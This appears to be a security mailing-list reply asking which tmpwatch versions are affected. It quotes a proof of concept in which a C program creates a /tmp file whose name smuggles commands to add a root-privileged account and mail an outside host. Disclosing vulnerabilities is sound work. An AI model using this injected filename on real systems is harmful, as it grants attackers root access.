Re: tmpwatch executes shell commands

["Mike M. Quimson" <mike () ISENTRY PH>]

what version of tmpwatch is affected by this?

"Alexander Y. Yurchenko" wrote:

> Here is a simple example of my playing with tmpwatch bug
>
> 1. Execute following in /tmp
>
> #include <stdio.h>
>
> int main()
> {
>    FILE *f;
>    char filename[100] = ";useradd -u 0 -g 0 haks0r;mail
> haks0r () somehost com<blablabla";
>
>    if((f = fopen(filename, "a")) == 0) {
>       perror("Could not create file");
>       exit(1);
>    }
>    close(f);
> }
>
> 2. cp /usr/sbin/adduser /tmp
> 3. Just wait for mail ;-)
>
> ---<*>---
>   grange